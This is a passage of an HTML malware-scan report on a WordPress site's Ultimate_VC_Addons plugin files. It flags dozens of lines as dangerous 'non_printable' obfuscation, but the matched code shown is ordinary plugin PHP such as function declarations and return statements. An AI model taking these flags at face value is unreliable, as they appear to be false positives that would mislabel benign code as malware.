</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_link_attr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_plugin_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_core_load'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_load</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Filtered plugin action links</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Ultimate_VC_Addons_license_form_and_links</span><span style="color: #007700">( </span><span style="color: #0000BB">$links </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bsf_inline_license_form' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #DD0000">'envato' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 149</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_skip_brainstorm_menu</span><span style="color: #007700">( </span><span style="color: #0000BB">$products </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Ultimate_VC_Addons_bsf_registration_page_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'plugins.php?bsf-inline-license-form=6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'plugins.php?bsf-inline-license-form=6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 165</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_bsf_registration_page_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=ultimate-product-license' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 173</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uvc_plugin_activate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">on_ultimate_vc_addons_activate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">to Plugins Page</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">ultimate_vc</span><span style="color: #DD0000">') . '</span><span style="color: #007700"></</span><span style="color: #0000BB">a</span><span style="color: #007700">></span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_addons</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_plugins_page_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$links </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice_for_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice_for_vc_activation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 281</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_ulitmate_presets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_init_vars</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_vc_translation</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_modal_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_woocommerce</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_our_element_on_page</span><span style="color: #007700">(</span><span style="color: #0000BB">$post_content</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 477</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_css_path_data</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$css_path_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 507</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_css_rtl</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$css_rtl</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #0000BB">$handle</span><span style="color: #007700">, </span><span style="color: #0000BB">$slug</span><span style="color: #007700">, </span><span style="color: #0000BB">$full_path </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$deps </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$ver </span><span style="color: #007700">= </span><span style="color: #0000BB">ULTIMATE_VERSION </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 542</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_js_path_data</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 545</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$js_path_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #0000BB">$handle</span><span style="color: #007700">, </span><span style="color: #0000BB">$slug</span><span style="color: #007700">, </span><span style="color: #0000BB">$full_path </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$deps </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$ver </span><span style="color: #007700">= </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">$footer </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 581</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_front_scripts</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 645</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_is_editor'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_291").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/classes/ultimate_helper.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 30</span><br><table id="file_292" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$final</span><span style="color: #007700">; } </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_GetBoxShadow'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_get_box_shadow'</span><span style="color: #007700">,</span><span style="color: #0000BB">10</span><span style="color: #007700">,</span><span style="color: #0000BB">3</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">wpb_resize</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_update_option'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$final</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_get_url'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_get_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$img</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 197</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'getImageSquereSize'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getImageSquereSize</span><span style="color: #007700">( </span><span style="color: #0000BB">$img_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$img_size </span><span style="color: #007700">) {</span>
</span>
